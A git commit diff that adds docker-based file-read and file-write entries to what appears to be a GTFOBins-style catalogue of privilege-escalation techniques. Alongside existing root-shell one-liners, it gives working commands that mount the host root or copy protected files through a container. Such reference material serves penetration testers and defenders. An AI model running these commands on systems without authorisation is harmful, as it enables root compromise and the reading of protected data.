Add file read and write as per #64 (temporary solution)

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Dominic Breuker 2019-07-02 15:53:28 +02:00 committed by Andrea Cardaci
parent 40ecb11b2e
commit dcbf66329a

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@ -5,6 +5,20 @@ functions:
shell: shell:
- description: Any other Docker Linux image should work, e.g., `debian`. The resulting is a root shell. - description: Any other Docker Linux image should work, e.g., `debian`. The resulting is a root shell.
code: docker run -v /:/mnt --rm -it alpine chroot /mnt sh code: docker run -v /:/mnt --rm -it alpine chroot /mnt sh
file-write:
- description: Write any file by copying it to an existing container and back to the target destination on the host. The file will be owned by root.
code: |
CONTAINER_ID=existing-docker-container
echo "sensitive config" > /tmp/file.txt
sudo docker cp /tmp/file.txt $CONTAINER_ID:/tmp/file.txt
sudo docker cp $CONTAINER_ID:/tmp/file.txt /target/destination.txt
file-read:
- description: Read any file by copying it to an existing container and back to a new location on the host.
code: |
CONTAINER_ID=existing-docker-container
sudo docker cp /root/protected.txt $CONTAINER_ID:/tmp/file.txt
sudo docker cp $CONTAINER_ID:/tmp/file.txt /home/user/file.txt
cat /home/user/file.txt
sudo: sudo:
- description: Any other Docker Linux image should work, e.g., `debian`. The resulting is a root shell. - description: Any other Docker Linux image should work, e.g., `debian`. The resulting is a root shell.
code: sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh code: sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh